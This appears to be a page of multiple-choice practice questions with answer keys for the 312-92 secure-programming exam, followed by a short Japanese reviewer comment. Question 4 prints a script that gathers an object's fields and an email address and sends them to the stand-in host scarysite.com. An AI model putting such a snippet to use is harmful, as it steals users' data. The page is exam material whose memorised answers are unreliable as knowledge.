Travis is working on some code in C# that will create a digital signature. What will the following snippet from his program accomplish?
childkat.xml signnode = xmlDoc.NewChild("signature", "")
A. Checks to make sure the signature is valid and still usable
B. Tells the algorithm which signature to use
C. Verify the XML signature
D. Create XML node to hold signature
正解:D
質問 2:
Carl just purchased an expensive smart phone to use for personal and business use. Carl wants to protect his investment so he decides to register the unique GSM number of the phone in case it is ever stolen. Which number should he have registered?
A. SIM card serial number
B. Phone manufacturer's serial number
C. 15-digit IMEI number
D. Device's phone number with country and area code
正解:C
質問 3:
Sherry is programming an online game and is trying to prevent security threats from being introduced into the game. She is also trying to prevent any kind of online cheating by searching for possible anomalies. Sherry especially wants to prevent cheating where a program or application is used to replace human reaction to produce superior results. What category of online cheating is she most concerned about?
A. Reflex augmentation
B. Artificial intelligence intervention
C. Authoritative clients
D. Vector-time augmentation
正解:B
質問 4:
Travis, a senior systems developer for YNY Services, received an email recently from an unknown source. Instead of opening the email on his normal production machine, Travis decides to copy the email to a thumb drive and examine it from a quarantined PC not on the network. Travis examines the email and discovers a link that is supposed to take him to
http://scarysite.com. Travis decides to get back on his production computer and examine the code of that site.
From the following code snippet, what has Travis discovered?
<script>
function object() {
this.email setter = captureobject
}
function captureobject(x) {
var objstring = ""
for(fld in this) {
obstring += fld + ": " this[fld] + ", ";
}
obstring += "email: " + x;
var req = new XMLHttpRequest();
req.open("GET", "http://scarysite.com?obj=" +
escape(objString), true);
req.send(null);
}
</script>
A. URL obfuscation
B. XSS attack
C. URL tampering
D. JavaScript hijacking
正解:D
質問 5:
Lyle is writing some code in VB.NET and is implementing some build-in security. What type of .NET security is Lyle using in the following code?
public class Myclass1
Public Sub New()
End Sub
Public Sub MyMethods()
Dim Perm As New MyPermission()
Perm.Demand()
End Sub
Pub Sub YourMethod()
End Sub
End Class
A. Explicit security
B. Implicit security
C. Declarative security
D. Imperative security
正解:D
質問 6:
Darren has just been hired on as the SQL dba for Fredrickson Inc., a marketing firm in New York City. He has been asked to clearn up the SQL databases on one of the servers. What SQL stored procedure could Darren use to remove user accounts from the databases?
A. sp_removeoldusers
B. sp_revokeusers
C. sp_denyaccess
D. sp_revokedbaccess
正解:D
質問 7:
Kyle is a web developer for Innovative Incorporated, a web development and graphics designing company in Dallas. Kyle is currently working on a web-based application for a client that wants dynamic and rich content on their site. Kyle is going to use java applets and flash animation to make the website really stand out. The client was adamant though about making sure the site used security features to ensure that the site itself and visitors alike would not have issues. What Java security feature can Kyle use in the development of the site to add security?
A. Sandbox
B. Limbo
C. JavaScan
D. Java quarantine
正解:A
質問 8:
Fred has just finished developing a number of ASP pages that will be posted to his company's website. Fred does not want the page's source code viewed by anyone, so he decided to encode the pages to make the source code unusable. What will the following command accomplish?
screnc /e asp *.* c:\tmp
A. Encode all ASP files in current directory as ASP files and place them in the c:\tmpdirectory
B. Encode all ASP files in in the c:\tmp and place them in the default IIS virtual directory
C. Create an MD5 hash for all ASP files in the c:\tmp directory
D. Encode all ASP files and place them in the c:\tmp directory
正解:A
質問 9:
Harold is writing a J2ME program that run an inventory application on his company's PDAs.
Employees will use their PDA to scan barcodes into the program Harold is writing. Harold is very concerned about securing his program's code and ensuring its integrity once it is utilized. Harold particularly wants to stop the execution of class files loaded in the virtual machine in any way, what is not allowed by java virtual machine specification. What level of J2ME security should Harold implement to accomplish this?
A. End-to-end security
B. Low-level-security
C. High-end security
D. Application level security
正解:B
尾崎** -
312-92試験に一発で合格したい人にはピッタリだと思う